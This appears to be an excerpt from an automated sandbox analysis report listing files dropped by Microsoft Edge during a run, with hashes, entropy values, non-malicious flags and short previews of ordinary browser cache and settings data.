                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):342
                                                                                                                                                                                                                              Entropy (8bit):5.2268511826871125
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:HUdUXq2PCHhJ23oH+TcwtfrzAdIFUt8YUHDWZmw+YU4PkwOCHhJ23oH+TcwtfrzS:NvBYeb9FUt8JW/+G56Yeb2J
                                                                                                                                                                                                                              MD5:720F0D9A9F58053D69861B99D3C9D8CD
                                                                                                                                                                                                                              SHA1:7D1013550DB4FC06188E26947344FBF445F27E4F
                                                                                                                                                                                                                              SHA-256:682F97B819237018535B63E10F71B2119D84375832A9E6C82F48FCD31E52594A
                                                                                                                                                                                                                              SHA-512:F42A01D2F8282B6EF522B9E5DB7BCB017B08BB14C25EF2DA42122D1E91A5D0A56CF03D104D2554600AAE21E37B2B8A39ACA3B05BC7AFE1B5C3EB973DEFB9B3E1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:2024/11/18-10:53:36.241 1f34 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/18-10:53:36.305 1f34 Recovering log #3.2024/11/18-10:53:36.307 1f34 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_1

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):270336
                                                                                                                                                                                                                              Entropy (8bit):0.0018090556708630736
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:MsEllllkEthXllkl2zEZl2tl:/M/xT02zTtl
                                                                                                                                                                                                                              MD5:15278775286811AE932B7DE33C4C6AA0
                                                                                                                                                                                                                              SHA1:099CCCD7C00825B904617AA90A7673F251B527D5
                                                                                                                                                                                                                              SHA-256:CF095E578BD90711C0E7CD4EEFB408D486AEDE86E0F475B8DA0869A3D2EBC35F
                                                                                                                                                                                                                              SHA-512:FD6A29C169231DBF8069F43E9AB02B189A33CC4F7976B52A1E8139BC1E4062E2645EB7A9B27A3FD162B48F191B546266B1B27D631E8CC72ED54566D7A90E973B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_1

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):270336
                                                                                                                                                                                                                              Entropy (8bit):0.0018164538716206493
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:MsEllllkEthXllkl2zEZlbvAul:/M/xT02zCFl
                                                                                                                                                                                                                              MD5:EF71BC9CF3005FB27E9F63FFB7352EC0
                                                                                                                                                                                                                              SHA1:6115664BCA6893BE9A683C4FED8D61CD526F1CD5
                                                                                                                                                                                                                              SHA-256:929E3C49CA66F667BC0F2D53F326D07F27D8A4929C86DA63F07937DEA70B0A60
                                                                                                                                                                                                                              SHA-512:CCA37BE38202B541F2E0E1CF71F0426B0A07446056B74139B826CDDBDCA8E02071591EFEFDEEE81EDE2FD92F14D7CE487B233BDB0DD55CBB2F43F137512652FC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):120
                                                                                                                                                                                                                              Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                              MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                              SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                              SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                              SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):13
                                                                                                                                                                                                                              Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                              MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                              SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                              SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                              SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:117.0.2045.47

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):44170
                                                                                                                                                                                                                              Entropy (8bit):6.090520956326506
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4keCLmZtstR96hOxq4gFkFDlwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynJtGhOxqQoRTuiVIos
                                                                                                                                                                                                                              MD5:F25ADC1325EDB7883A8F2DE24372A781
                                                                                                                                                                                                                              SHA1:9E1666A98593919EB1D757A66F662176E46173B5
                                                                                                                                                                                                                              SHA-256:B2F4DA5AB8E316E646C16375B44B637BBE18DBBD9E858CF2CB59F3E89E24F0FA
                                                                                                                                                                                                                              SHA-512:FEF6A872E58C00574A6C13C838E69C64284BDF17D255BA1EF64FCDD5548E25054AFB062826D36C15AB4AF8CC3F744BA54C65AEFE979A6E89B3CAF06D513EEADE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF367e3.TMP (copy)

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):44170
                                                                                                                                                                                                                              Entropy (8bit):6.090520956326506
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4keCLmZtstR96hOxq4gFkFDlwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynJtGhOxqQoRTuiVIos
                                                                                                                                                                                                                              MD5:F25ADC1325EDB7883A8F2DE24372A781
                                                                                                                                                                                                                              SHA1:9E1666A98593919EB1D757A66F662176E46173B5
                                                                                                                                                                                                                              SHA-256:B2F4DA5AB8E316E646C16375B44B637BBE18DBBD9E858CF2CB59F3E89E24F0FA
                                                                                                                                                                                                                              SHA-512:FEF6A872E58C00574A6C13C838E69C64284BDF17D255BA1EF64FCDD5548E25054AFB062826D36C15AB4AF8CC3F744BA54C65AEFE979A6E89B3CAF06D513EEADE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF38b1a.TMP (copy)

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):44170
                                                                                                                                                                                                                              Entropy (8bit):6.090520956326506
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4keCLmZtstR96hOxq4gFkFDlwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynJtGhOxqQoRTuiVIos
                                                                                                                                                                                                                              MD5:F25ADC1325EDB7883A8F2DE24372A781
                                                                                                                                                                                                                              SHA1:9E1666A98593919EB1D757A66F662176E46173B5
                                                                                                                                                                                                                              SHA-256:B2F4DA5AB8E316E646C16375B44B637BBE18DBBD9E858CF2CB59F3E89E24F0FA
                                                                                                                                                                                                                              SHA-512:FEF6A872E58C00574A6C13C838E69C64284BDF17D255BA1EF64FCDD5548E25054AFB062826D36C15AB4AF8CC3F744BA54C65AEFE979A6E89B3CAF06D513EEADE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3a44f.TMP (copy)

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):44170
                                                                                                                                                                                                                              Entropy (8bit):6.090520956326506
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4keCLmZtstR96hOxq4gFkFDlwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynJtGhOxqQoRTuiVIos
                                                                                                                                                                                                                              MD5:F25ADC1325EDB7883A8F2DE24372A781
                                                                                                                                                                                                                              SHA1:9E1666A98593919EB1D757A66F662176E46173B5
                                                                                                                                                                                                                              SHA-256:B2F4DA5AB8E316E646C16375B44B637BBE18DBBD9E858CF2CB59F3E89E24F0FA
                                                                                                                                                                                                                              SHA-512:FEF6A872E58C00574A6C13C838E69C64284BDF17D255BA1EF64FCDD5548E25054AFB062826D36C15AB4AF8CC3F744BA54C65AEFE979A6E89B3CAF06D513EEADE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                              Entropy (8bit):0.5898156356912286
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:TLyeuAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3isXuymds6BbrdFLt4l0r:TLyXOUOq0afDdWec9sJwziZ4Z7J5fc
                                                                                                                                                                                                                              MD5:DEE6B30FA987F315C47F9F5D037DA482
                                                                                                                                                                                                                              SHA1:3B439394FDBEE3E6322867EC8A77E6616C907D49
                                                                                                                                                                                                                              SHA-256:9EECB1D073647DBAC1040EA9743357EE284CAFFD01E68BA2CFCEF4705CD30F98
                                                                                                                                                                                                                              SHA-512:3697E9D5311E479E13AC5D5C51820BAA6B823E8F90C7FE7AB41E667BE462D712E21CAFD7BAD9B99CC3E78560F1920C2CB4E87AAFD791168DFD27355D04E56D5C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_1

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):270336
                                                                                                                                                                                                                              Entropy (8bit):0.0018164538716206493
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:MsEllllkEthXllkl2zEZlol:/M/xT02zPl
                                                                                                                                                                                                                              MD5:07DBBAF5E0B3AAC586751C37EE95CBD7
                                                                                                                                                                                                                              SHA1:B2E980AD36E1B75A03686C1E97FFDA55DD0A981F
                                                                                                                                                                                                                              SHA-256:D0C6EF6E32AC1A284162265CF845B10CE7C73C763F4D6252206124D1B3522928
                                                                                                                                                                                                                              SHA-512:482C46974E07F835094F76674550B1D1E829200565E452BFA9F480256A28EA9E841A4D42218AD74734F7D8BC7806DB9F8A053B2DC09FE672B7BE3702BFA92CE6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):47
                                                                                                                                                                                                                              Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                              MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                              SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                              SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                              SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):35
                                                                                                                                                                                                                              Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                              MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                              SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                              SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                              SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:{"forceServiceDetermination":false}

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):50
                                                                                                                                                                                                                              Entropy (8bit):3.9904355005135823
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:0xXF/XctY5GUf+:0RFeUf+
                                                                                                                                                                                                                              MD5:E144AFBFB9EE10479AE2A9437D3FC9CA
                                                                                                                                                                                                                              SHA1:5AAAC173107C688C06944D746394C21535B0514B
                                                                                                                                                                                                                              SHA-256:EB28E8ED7C014F211BD81308853F407DF86AEBB5F80F8E4640C608CD772544C2
                                                                                                                                                                                                                              SHA-512:837D15B3477C95D2D71391D677463A497D8D9FFBD7EB42E412DA262C9B5C82F22CE4338A0BEAA22C81A06ECA2DF7A9A98B7D61ECACE5F087912FD9BA7914AF3F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:topTraffic_170540185939602997400506234197983529371

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):575056
                                                                                                                                                                                                                              Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                              SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                              MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                              SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                              SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                              SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9
                                                                                                                                                                                                                              Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                              MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                              SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                              SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                              SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:uriCache_

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):179
                                                                                                                                                                                                                              Entropy (8bit):5.012049423288829
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclXXfU:YWLSGTt1o9LuLgfGBPAzkVj/T8lHfU
